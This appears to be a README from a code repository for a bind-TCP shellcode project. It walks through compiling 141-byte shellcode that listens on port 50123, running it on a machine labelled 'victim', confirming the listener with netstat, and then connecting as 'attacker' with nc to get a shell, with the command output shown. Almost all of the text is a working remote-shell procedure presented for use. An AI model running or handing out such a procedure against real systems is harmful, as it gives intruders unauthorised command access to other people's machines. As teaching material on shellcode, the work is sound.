You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

35 lines
1.5 KiB

12 years ago
1. Compile the shellcode
$ ./ shell_bind_tcp 50123
[I] Using custom port: 50123
[+] Assembling shell_bind_tcp.nasm with NASM ...
[+] Linking shell_bind_tcp.o ...
[+] Generating shellcode with objdump ...
[+] Checking shellcode for NULLs ...
[+] Shellcode size is 141 bytes
[+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
[+] Compiling shellcode.c with GCC ...
[+] All done! You can run the shellcode now:
$ ./shellcode
1. Run the shellcode on the victim machine
victim $ ./shellcode
Shellcode Length: 141
victim # netstat --inet -apn |grep shellcode
tcp 0 0* LISTEN 982/./shellcode
2. Attacker can now connect and get the shell
attacker $ nc localhost 50123
uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023